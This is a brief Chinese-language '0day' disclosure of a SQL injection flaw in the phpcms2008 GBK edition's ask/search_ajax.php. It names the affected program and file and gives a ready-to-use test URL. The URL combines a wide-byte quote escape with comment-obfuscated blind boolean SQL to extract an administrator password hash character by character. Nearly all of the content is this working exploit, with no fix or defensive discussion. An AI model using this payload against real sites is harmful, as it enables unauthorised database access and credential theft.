phpcms2008-0day ask/search_ajax.php注入漏洞
安全
作者:nuke
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
测试方法:
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23
